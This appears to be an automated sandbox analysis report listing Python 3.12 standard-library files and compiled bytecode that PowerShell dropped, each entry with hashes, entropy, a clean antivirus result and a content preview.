                                                                                                    SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                                                                                                    MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                                                                                                    SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                                                                                                    SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                                                                                                    SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6098
                                                                                                    Entropy (8bit):4.192824803537849
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsBWP4m4FE8445m4IinbyQqVRA6U4e4nC8s:ELj/7euM4QgoofXsU4m4FH4484I+byFW
                                                                                                    MD5:06C63C4624FB2BE6BEFD2E832B3B4BC2
                                                                                                    SHA1:D373F09FCAC33928E9F5330B0C6D1CFDB2F73B0A
                                                                                                    SHA-256:CF8031A6E21150438F3D2964C4152615B91A03894616D5B6930E0F14F44DABDA
                                                                                                    SHA-512:24D7CD2E0959E90DE5E4D252BCB655376833A948B03E99E2CE727CE115BFFE0247475D9EF096A4AACAFDBD1D3681031F44E63DE9A77B221B444C4FC40574A86E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import GenericAlias....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6726
                                                                                                    Entropy (8bit):4.486484271805505
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:gPAaxlPQ/yqe//e/2Dkpps4mWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlPGu9kv+0TmnTLikZW9CxbOJbYQ
                                                                                                    MD5:DFF4191A9750BEA25195EB71E1900BC9
                                                                                                    SHA1:8E8A36CFF4D530173246ED9E11B4B725AA928745
                                                                                                    SHA-256:D51C54428495CD62A5DA4360315FA84F692B5AA9DB21BE986B3E14A83F7CF288
                                                                                                    SHA-512:E65AE5548AB347AE2597D30DBD0198BCAE062ED8547D83B61FF64F929538AEBE772928444F8AE42724E63C760267B573A505D27B9A987A96F23F232B1445CFFA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, arg1, arg2, argN):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmet
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35195
                                                                                                    Entropy (8bit):4.473668543181026
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Ob3TMIq3JRejezqFTTQjJFUT2uXUmwlKjevW7ZigkLmS3V2XpRY:4MHDejezqFvgAT2u/NKvW7dkZlMY
                                                                                                    MD5:29B0B8756C6385B118FE2DFB14C14E60
                                                                                                    SHA1:D4B227129C2AC363985958C029A49E262009C968
                                                                                                    SHA-256:36A33CB62BCE2EEFC61AD2C7C7555407404481A9543F1C366C32CDE3513D8A14
                                                                                                    SHA-512:72E9E6E6657648214AA3103191350ABD395C9F18632E1AB0B8B288F2F20FCF082866565EEB3423B05E3FCE3009210EA0323417021BE7F8B7AD5CE9F2E26A0EA7
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):5.2580863991460935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                    MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                    SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                    SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                    SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                    Malicious:false
                                                                                                    Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):104119
                                                                                                    Entropy (8bit):4.3030977393835945
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:g3gKb2hia9uoUtRLsuQ6vuehQEy17ulHC91vhAxs/GNu:gQKb2hiaEaouehQEy17ulc1vix8GU
                                                                                                    MD5:9ABA51F90E74A8E274049641C983CE6E
                                                                                                    SHA1:1A442F0D9615D4579C8E13423B9E214C4CFF01F4
                                                                                                    SHA-256:7778CD670473220869FBF4E58022EACED79B6E10F0F19A5A9C75E48144A47CED
                                                                                                    SHA-512:36864CF907C2947A9143D2FBC2AB94D4D956D5C70BAF41B1A2788FEE6A6D7DCD12CC2FDE2EA8EEF42D7520E4102DAD1CA75064DE4A6E72FB22FE187CEA623CB3
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66095
                                                                                                    Entropy (8bit):4.436459922159699
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:pZ0JQ/yNX9e8T1Y+XxAB9NHWingliua1wDGy1:pZoIyNX9/xSNHTngl+1E1
                                                                                                    MD5:5151A0383BADE72982C59D5E7BD5B2AC
                                                                                                    SHA1:D91D8446C427B23FA39B603DFDE047028471A288
                                                                                                    SHA-256:A3CC2501761596DB13CDC84F085DD2736E5C352B51F39F26BDD2407D99DFBB72
                                                                                                    SHA-512:5A46B0923EF9F1E42123D98B0CA62C2AFDC337B90788B9849A16BB77E8795E57F7E1121339B0D39B4FF9AB467AD11D36E532D5BEF5E299E196202090BCD0BA20
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1267
                                                                                                    Entropy (8bit):4.375636067554557
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:cangJHXiJ6sam35P1cBwj6ju/EPvT+C2cNbgsr0rBP/iZ7Z3fNPS78Wmie/R54:cangJHXiJ6sRp1cBwj6q/EHT+Ntw7gek
                                                                                                    MD5:727CA595DFCADE1F361549C0F5B5A8EB
                                                                                                    SHA1:F6D971FED478BBFC41B5CB6E37AADE9E6B9FBEB8
                                                                                                    SHA-256:5E7FBE996045D0CFBC0F2C76A8291EE59A595645CD823FE72BBF211DBA762B86
                                                                                                    SHA-512:32797A15155C0EA206792F6BA800E01AC56B764898087DEFB35D5D1FB07F1FE667A411AE0412F5555F5C3DF145FEF4B41E978EC09C463C3FC7A56448FE2A7D40
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""The asyncio package, tracking PEP 3156."""....# flake8: noqa....import sys....# This relies on each of the submodules having an __all__ variable...from .base_events import *..from .coroutines import *..from .events import *..from .exceptions import *..from .futures import *..from .locks import *..from .protocols import *..from .runners import *..from .queues import *..from .streams import *..from .subprocess import *..from .tasks import *..from .taskgroups import *..from .timeouts import *..from .threads import *..from .transports import *....__all__ = (base_events.__all__ +.. coroutines.__all__ +.. events.__all__ +.. exceptions.__all__ +.. futures.__all__ +.. locks.__all__ +.. protocols.__all__ +.. runners.__all__ +.. queues.__all__ +.. streams.__all__ +.. subprocess.__all__ +.. tasks.__all__ +.. taskgroups.__all__ +.. threads.__all__ +.. timeo
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3468
                                                                                                    Entropy (8bit):4.2876076098197755
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:OzuFQi/qD6/ftAj2UKQOyRm3sSxvxY/yxgm6/Zz:Oe/1Aj2UXOyRmtxvxY/yxK/Zz
                                                                                                    MD5:4C758632BA30CBD5CA8F50830E11975C
                                                                                                    SHA1:832901CED4439EA98184031244AB36F500065094
                                                                                                    SHA-256:82FDC4CD81292B82241AE8EAC259F977F33D7DF882EFC53B75C37C4CC85C525C
                                                                                                    SHA-512:8660C250524FAC2BCC943A6539E66837DC2F2E4DAD582679C3BB472112C1E7207FE1F938AF0AE0A4423952D4997FB781C25D36E511548A6D4C0464A6FF3529BE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import ast..import asyncio..import code..import concurrent.futures..import inspect..import sys..import threading..import types..import warnings....from . import futures......class AsyncIOInteractiveConsole(code.InteractiveConsole):.... def __init__(self, locals, loop):.. super().__init__(locals).. self.compile.compiler.flags |= ast.PyCF_ALLOW_TOP_LEVEL_AWAIT.... self.loop = loop.... def runcode(self, code):.. future = concurrent.futures.Future().... def callback():.. global repl_future.. global repl_future_interrupted.... repl_future = None.. repl_future_interrupted = False.... func = types.FunctionType(code, self.locals).. try:.. coro = func().. except SystemExit:.. raise.. except KeyboardInterrupt as ex:.. repl_future_interrupted = True.. future.set_exception(ex).. return..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1496
                                                                                                    Entropy (8bit):5.057675330980539
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hEmPkOfuhSqpwRT6NVlWn6PYSZoYs5Lx06F+bVh2qaT42:qmPKquen6PBBkLx0x51Q42
                                                                                                    MD5:0305331BCBB392240C87BEDEFABA382C
                                                                                                    SHA1:35F388E60BACF3449DDE6825C678F830234FD53B
                                                                                                    SHA-256:F4C38091ED565475022BABD4541811A292428685743C702B1445BB413F4EC8F7
                                                                                                    SHA-512:173646917DF60667899F289DE6E93E19F5F6209152AFBC76678EBFA7DD852832CBCEED85968145CD600307B5A97B8FCD9FF5D2AE894B144DF2B67A09D391FAC6
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.Z.d.d.l.Z.d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....d.d.l.....e.j$..................e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...e.j$..................z...Z.e.j&..................d.k(..r.d.d.l.....e.e.j$..................z...Z.y.d.d.l.....e.e.j$..................z...Z.y.).z'The asyncio package, tracking PEP 3156......N.....)...*..win32)...__doc__..sys..base_events..coroutines..events..exceptions..futures..locks..protocols..runners..queues..streams..subprocess..tasks..taskgroups..timeouts..threads..transports..__all__..pla
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):86649
                                                                                                    Entropy (8bit):5.398268600589993
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:6W8yarOdICDg2MXuX/F+OiUGqTLz5zI4lK:gJ8gJXuPg/qj5zIz
                                                                                                    MD5:D889D4DC2220A4CD07677AB1B74A0ACC
                                                                                                    SHA1:F0CB64728EA0DFCCBB434F30B671EE78379847EC
                                                                                                    SHA-256:3E260705F64BFF5441BF806D39F788B5128BF5FE94B00387E586EB20F2818A74
                                                                                                    SHA-512:562C7261C2C68010757E224FF31D443046984160E3FF9901C0DE416BEFC94385B59563C4380446CEA7453CEC1B23FF62FDF5D850C1A70344406A798089B5FBFC
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fo8........................>.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l.m!Z!..d.d.l"m#Z#..d.Z$d.Z%d.Z&..e'e.d.........Z(d.Z)d...Z*d...Z+d...Z,d&d...Z-d'd...Z.d...Z/..e'e.d.........r.d...Z0n.d...Z0d...Z1..G.d ..d!e.jd..........................Z3..G.d"..d#e.jh..........................Z5..G.d$..d%e.jl..........................Z7y.#.e.$.r...d.Z.Y...w.x.Y.w.)(a....Base implementation of event loop...The event loop can be broken up into a multiplexer (the part.responsible for notifying us of I/O events) and the event loop proper,.which wraps a multiplexer with functionality for scheduling callbacks,.immediately or at a given time in the future...Whenever a public API takes a callback, subsequent positional.arguments will be passed to t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3125
                                                                                                    Entropy (8bit):5.273056654169252
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:YCrztq9FGsMIr+0Tm+XaOrNnagJjx4cjiYp5piNkzy62enld:Xz8g5yxDjHpiNfb8ld
                                                                                                    MD5:420AE0CFA5317B7B8B37866837BA19CB
                                                                                                    SHA1:49973A21827438524D0E3B304EE89D388ADA27A7
                                                                                                    SHA-256:D35541A4D503F325BFC5AD462924CDC8F1D36762B311855D447F88538D96C3FB
                                                                                                    SHA-512:A76B11AA3AEBE405925174B5F1F4F4A009E621B297E563F2D902D62618E217223B5F6B462F1193D0C5B92A58547A5DFCB45B9B6D72501950658D4D57CC76A8A4
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................h.....d.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.Z.d.Z.d...Z.d...Z.d...Z...e.j...........................d...........Z.y.)........N.....)...format_helpers..PENDING..CANCELLED..FINISHEDc.....................N.....t.........|.j...................d.........x.r...|.j...................d.u.S.).z.Check for a Future... This returns True when obj is a Future instance or is advertising. itself as duck-type compatible by setting _asyncio_future_blocking.. See comment in Future for more details.. .._asyncio_future_blockingN)...hasattr..__class__r....)...objs.... .RC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_futures.py..isfuturer........s+...........C.M.M.#=..>....5.....(..(....4....6.....c..................... .....t.........|.........}.|.s.d.}.d...}.|.d.k(..r...|.|.d.....d.............}.nc|.d.k(..r+d.j.....................|.|.d.....d...............|.|.d.....d.....................}.n3|.d.kD..r.d.j.....................|.|.d.....d....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16141
                                                                                                    Entropy (8bit):4.81325239522766
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Q/1E7A/+43w96wI+iPdwD99/mzyq6J1K+54EUg3F8s/1iT5ODOoAZNQEaSABb2pX:QcTqwUwI+i6D99/B1M0P78AU/sWV
                                                                                                    MD5:127AF1319C85D9C31A5CF8B2EA272930
                                                                                                    SHA1:19CD27E3CD882A3DF4E27FA04350B8C253710C67
                                                                                                    SHA-256:690A57AAAA98FAA67FA7DBEFDE7A75491FA45F28CE8B50237B5691615FA088F1
                                                                                                    SHA-512:E55028CAD5239B740D15D88A7280312DA0FEC50F8A8618F4C26E53D9DEF251A2A8B5DE94AF4735B77F37389E3655958375BABFF004DE1AF3D9125A91F4474B7D
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.#..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z.y.)......N.....)...protocols)...transports)...loggerc............................e.Z.d.Z...d...f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.e.j...................f.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...x.Z.S.)...BaseSubprocessTransportc.....................n.......t...........|.....|...........d.|._.........|.|._.........|.|._.........d.|._.........d.|._.........d.|._.........g.|._.........t.........j...........................|._.........i.|._.........d.|._.........|.t.........j...................k(..r.d.|.j...................d.<...|.t.........j...................k(..r.d.|.j...................d.<...|.t.........j...................k(..r.d.|.j...................d.<.......|.j ..................d.|.|.|
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4126
                                                                                                    Entropy (8bit):5.010956848606777
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:uOlx5RYGODNmByK2S+rDZjrjYFyGkhIv4Yos0ee2nJsZ1Xgp9lyRoJwY:uOlxcDQMZjrjYMGCW2sPWZypPgY
                                                                                                    MD5:38FF290F8967A776558ED039E8DBAFFC
                                                                                                    SHA1:0A31A4AD9A03D6FC864CD8DF69D6FF1A86B8AAA4
                                                                                                    SHA-256:31576386F316C69789FC080A48A3DED69C700AA24235FC13D768D56038FC0E24
                                                                                                    SHA-512:F9510BC654E4B2F4FA707AE09D3A4AC4C16A7A768D66B79936096045FD019ED13697377EBFEC914730DA63A394B61C8FE8F78455BC5C31ED81814AA3EF936AB0
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d...Z...e.j...........................d...........Z.d...Z.d...Z.y.)......N.....)...base_futures)...coroutinesc..........................t.........j...................|.........}.|.j...........................r.|.j...........................s.d.|.d.<...|.j...................d.d.|.j...........................z.............|.j.....................|.j...................d.d.|.j.................................|.j...................r5t.........j...................|.j...........................}.|.j...................d.d.|...d.............|.S.).N..cancellingr....r....z.name=%r.....z.wait_for=z.coro=<..>).r......_future_repr_infor......done..insert..get_name.._fut_waiter.._coror......_format_coroutine)...task..info..coros.... .PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\base_tasks.py.._task_repr_infor........s...........)..).$../.D........................Q......K.K...9.t.}.}..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):994
                                                                                                    Entropy (8bit):5.436833421613762
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:h4JJKlPYVdVz4tlgko4KqIrahXvUl0WpqVtLTN+MQ3djeWCkMkmhErqDSpvjCHlK:h4JJ+QFx4Lfsl0Wpk+TtjjmhEmsrCHlK
                                                                                                    MD5:838C9BC4C34093F88DE57D94639C3F2E
                                                                                                    SHA1:8657649AAE2403D6C26AA0B084169806B10E2D13
                                                                                                    SHA-256:D77545596D608B8E8619BDF731D53E7343FAEF54B560D4D3373545B60E9262FA
                                                                                                    SHA-512:B440FBC15094371DF7095EAE2EF4DA2727514EA7F86F83AD22C2C2A46B975A4A32FAE8D465F37B484AD7153D1B63B86B60D2C28954C619A165294E3A0AD65D87
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f..........................Z.....d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...G.d...d.e.j...........................Z.y.)......N...............g......N@g......>@i.........i....i,...c.....................r.....e.Z.d.Z...e.j...........................Z...e.j...........................Z...e.j...........................Z.y.)..._SendfileModeN)...__name__..__module__..__qualname__..enum..auto..UNSUPPORTED..TRY_NATIVE..FALLBACK........OC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\constants.pyr....r....&...s).........$.).).+.K............J....t.y.y.{.Hr....r....).r.....!LOG_THRESHOLD_FOR_CONNLOST_WRITES..ACCEPT_RETRY_DELAY..DEBUG_STACK_DEPTH..SSL_HANDSHAKE_TIMEOUT..SSL_SHUTDOWN_TIMEOUT.!SENDFILE_FALLBACK_READBUFFER_SIZE. FLOW_CONTROL_HIGH_WATER_SSL_READ.!FLOW_CONTROL_HIGH_WATER_SSL_WRITE..THREAD_JOIN_TIMEOUT..Enumr....r....r....r......<module>r........s^................%&..!...................................%/..!.#&.. .$'..!..............D.I.I.....r....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3808
                                                                                                    Entropy (8bit):5.19912182953302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ICshgl/Cunop8DE/cLQc8Q7fMEoYeIEfMR32gSwlooumiAImqJkUGXH:4hgl/waDE/cLGOkn7MN2gplpzvnqJkrX
                                                                                                    MD5:4CD67864B6A7000FFCF2CF8C132F7492
                                                                                                    SHA1:0661E09E6628F83793CD721A55874B5E938512A5
                                                                                                    SHA-256:A7BCA2096843030E2E2CE1FD38D13441D002C9936BFA7F543EF7779610BE2AAA
                                                                                                    SHA-512:512D6A160BA5CF58A8BA7963723450056C214755F50CA8D4F5075F381A2068052E4950D7A4EA33F1F11EED7D36CE0BB633DF4DC5C3E67EB956731845038114EB
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f{..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d...Z...e.........Z.d...Z.e.j...................e.j...................j...................f.Z...e.........Z.d...Z.d...Z.y.).)...iscoroutinefunction..iscoroutine.....Nc...........................t.........j...................j...................x.sE..t.........j...................j.....................x.r(..t.........t.........j...................j...................d.................S.).N..PYTHONASYNCIODEBUG)...sys..flags..dev_mode..ignore_environment..bool..os..environ..get........PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\coroutines.py.._is_debug_moder........sF.........9.9..........N..c.i.i.&B.&B."B...#M.."&.r.z.z.~.~.6J.'K."L....N.r....c.....................V.....t.........j...................|.........x.s...t.........|.d.d.........t.........u.S.).z6Return True if func is a decorated coroutine function..._is_coroutineN)...inspectr......getattrr....)...funcs.... r....r...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36792
                                                                                                    Entropy (8bit):5.124907669725236
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:6eSkuOtRv7+Ue1Si9IAjRyHUDP47jgLzBabgsq+Qi:DtRi9lYHUDP47jU1abgsqZi
                                                                                                    MD5:726895B47C74E72F564E80BAD891CDE7
                                                                                                    SHA1:FA6FA922E2B8E4A96AFA5288D1FBEC8B15EAF102
                                                                                                    SHA-256:A50B9DC62CFB84F2AC9B7AF31EB6DD510C9049D77AAF32EE669FF952DEE29286
                                                                                                    SHA-512:AB008B62BDA84D054B788D5B8C9BA230E06DD428FDD544A306F59749437164C6E33BADB1BA307BF69459447CE69D69C5690161DB2EFF89AB1AE9DFF16D5559B5
                                                                                                    Malicious:false
